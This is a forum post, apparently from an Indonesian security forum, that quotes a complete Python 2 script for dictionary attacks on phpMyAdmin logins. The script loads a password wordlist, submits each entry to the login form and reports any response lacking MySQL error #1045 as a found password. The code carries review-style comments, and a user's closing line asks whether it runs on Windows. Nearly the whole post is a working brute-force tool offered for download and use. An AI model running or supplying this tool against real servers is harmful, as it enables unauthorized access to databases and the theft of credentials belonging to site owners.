New Tool for indonesianbacktrack - simple phpmyadmin dict attack
#12
(01-10-2013, 02:36 AM)mywisdom Wrote: New Tool for indonesianbacktrack - simple phpmyadmin dictionary attack

download url : /tools/phpmyadmin_dict_attack.py


Code:
#!/usr/bin/python
#a very simple phpmyadmin dictionary attack tool
#requirement : mechanize and cookielib
#by: Antonius (www.indonesianbacktrack.or.id - www.cr0security.com - #www.codewall-security.com  )
import sys, re
try:
    import mechanize,cookielib
except Exception, err:
    print "\tSorry ! Please install this python module : mechanize and cookielib before using this ! "
    sys.exit(1);

def banner():
    """Print the tool's title block between two terminal-wide rule lines."""
    title_lines = (
        "\tPhpMyAdmin Dictionary Attack Tool",
        "\tsimple code by : Antonius",
        "\twww.cr0security.com - www.codewall-security.com - www.indonesianbacktrack.or.id",
    )
    print_liner_fix_width_with_terminal()
    # Single-argument print(...) emits the same text under the Python 2
    # interpreter this script targets.
    for title_line in title_lines:
        print(title_line)
    print_liner_fix_width_with_terminal()

def usage():
    """Print the command-line synopsis, the option list and four sample calls.

    The -v and -t options are listed here, but nothing in this file reads
    them: main() only consumes the url, username and wordlist arguments.
    """
    prog = sys.argv[0]
    sample = "\tExample : " + prog + " http://127.0.0.1/phpmyadmin root passwords.txt"
    print("\tUsage : " + prog + " <url> <username> <wordlist> <options>")
    print("\tOptions : \n\t\t -v : verbose \n\t\t -t : use multithreading")
    # The same sample line is shown bare and with each option combination.
    for suffix in ("", " -v", " -t", " -t -v\n"):
        print(sample + suffix)
    
def read_dictionary(dict):
    """Load the wordlist file at path ``dict`` into a list of stripped lines.

    Prints the path being used and the number of entries loaded. If the file
    cannot be opened, prints a message and exits the process with status 1.

    NOTE(review): the returned list does not mirror the file. The line read
    before the loop is never stored, the loop stops at the first line that is
    empty after stripping (a blank line or end-of-file), and that empty string
    is appended as the last element and included in the printed count.
    The file handle is never closed, the parameter name shadows the builtin
    ``dict``, and the bare ``except`` also catches KeyboardInterrupt.
    """
    print "[+] Using password list : " + dict
    try:
        fd = open(dict)
    except:
        print "\tSorry failed to open " + dict
        sys.exit(1)
    # Priming read: this value only feeds the first loop test.
    content = fd.readline()
    x = 0
    LList = []
    while (content != ""):
        # str.replace returns a new string; the result is discarded here.
        content.replace( "\n", "" )
        # Overwrites the line just tested with the next one from the file.
        content = fd.readline()
        content=content.strip()
        # Grow the list by one placeholder slot, then store the line in it.
        LList.append(1)
        LList[x] = content
        x = x + 1
    print "[+] Loaded total : " + str(x) + " words"
    return LList

def  phpmyadmin_login(url, username, passwd):
    """Submit one username/password pair to the login form at ``url``.

    Builds a new mechanize.Browser with an empty cookie jar on every call,
    opens ``url``, fills the form named 'login_form' and submits it.

    Returns the body of the response to the form submission.

    On the server side each call therefore appears as a fresh session: one
    request for the login page followed by one form submission, both sent
    with the fixed User-agent string 'Mozilla/5.0'.
    """
    # The candidate password is echoed to stdout in clear text.
    print "[+] trying : " + username + ", password : " + passwd
    br = mechanize.Browser()
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)
    br.set_handle_equiv(True)
    br.set_handle_redirect(True)
    br.set_handle_referer(True)
    # robots.txt handling is switched off for this browser.
    br.set_handle_robots(False)
    # Uses mechanize's private _http module; max_time=3 presumably limits
    # which refresh delays are followed (confirm against mechanize docs).
    br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=3)
    br.addheaders = [('User-agent', 'Mozilla/5.0')]
    try:
        br.open(url)
    except Exception, err:
        # NOTE(review): a failed open only prints "failed"; execution
        # continues to select_form, which presumably raises because no page
        # was loaded (confirm).
        print "failed"
    br.select_form(name='login_form')
    # The readonly flag is cleared so the assignments below are accepted;
    # presumably these are hidden fields in the form (confirm).
    br.find_control("server").readonly = False
    br.find_control("lang").readonly = False
    br.find_control("convcharset").readonly = False
    br["server"] = "1"
    # only for English-language phpMyAdmin
    br["lang"] = "en-utf-8"
    br["convcharset"] = "iso-8859-1"
    br["pma_username"] = username
    br["pma_password"] = passwd
    # NOTE(review): these assign attributes on the Browser object; whether
    # mechanize applies them to the selected form is not visible here.
    br.method = "POST"
    br.action = url
    br.submit()
    login_res = br.response().read()
    return login_res

#def getTerminalSize taken from /questions/566746/how-to-get-console-window-width-in-python (using ioctl)
def getTerminalSize():
    """Return the terminal size as a ``(columns, rows)`` pair of ints.

    Tries the TIOCGWINSZ ioctl on file descriptors 0, 1 and 2, then on the
    controlling terminal, and finally falls back to the LINES and COLUMNS
    environment variables with defaults of 25 and 80.
    """
    import os

    def query_winsize(descriptor):
        # Returns the unpacked (rows, columns) pair, or None on any failure
        # (missing module, descriptor that is not a terminal, ...).
        try:
            import fcntl, termios, struct, os
            return struct.unpack('hh', fcntl.ioctl(descriptor, termios.TIOCGWINSZ, '1234'))
        except:
            return

    size = None
    for descriptor in (0, 1, 2):
        size = query_winsize(descriptor)
        if size:
            break

    if not size:
        # None of the standard streams is a terminal: ask the controlling tty.
        try:
            tty_fd = os.open(os.ctermid(), os.O_RDONLY)
            size = query_winsize(tty_fd)
            os.close(tty_fd)
        except:
            pass

    if not size:
        environ = os.environ
        size = (environ.get('LINES', 25), environ.get('COLUMNS', 80))

    rows, columns = size[0], size[1]
    return int(columns), int(rows)

def print_liner_fix_width_with_terminal():
    """Print one rule line of '=' characters as wide as the terminal."""
    columns = getTerminalSize()[0]
    # String repetition yields the same text as appending '=' once per column.
    print("=" * columns)

def main():    
    """Parse the command line and try each wordlist entry against the form.

    Expects at least three arguments: url, username and wordlist path. With
    fewer, prints the usage text and exits with status 1. The -v and -t
    options shown by usage() are not read here.

    Attempts are made one at a time, in list order, with no delay between
    them. The process exits with status 1 on the first response that does not
    contain the text "#1045"; if every response contains it, the function
    returns normally.
    """
    banner()
    if len(sys.argv) < 4:
        usage()
        sys.exit(1)
    # NOTE(review): the loop variable is unused; every pass assigns the same
    # three values, and the length check above already guarantees they exist.
    for arg in sys.argv:
        try:
            url = sys.argv[1]
            login = sys.argv[2]
            dictionary= sys.argv[3]
        except Exception, err:
            usage()
            sys.exit(1)
    print "[+] Starting dictionary attack at url : " + url
    print "[+] Using login : " + login
    print_liner_fix_width_with_terminal()
    DList = read_dictionary(dictionary)
    # Assigned but not used afterwards.
    x = len(DList)
    for word in DList:
        # Entries of length 0 or 1 are skipped.
        if len(word) > 1:
            result = phpmyadmin_login(url, login, word)
            # A failed login is recognised only by "#1045" in the response
            # body. Any response without that text, such as an error or
            # block page, takes the "Found login" branch, so that message is
            # not proof of a valid credential.
            if re.search("#1045", result):
                print "[-] Login Failed:",word
            else:
                print "[+] Found login : " + login + " and Password : " + word
                # Exit status is 1 here as well as on the usage errors above.
                sys.exit(1)
                
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()

Requirements: the Python modules mechanize and cookielib, and a password list.

klo di wedus gk bisa d pake ya om ?

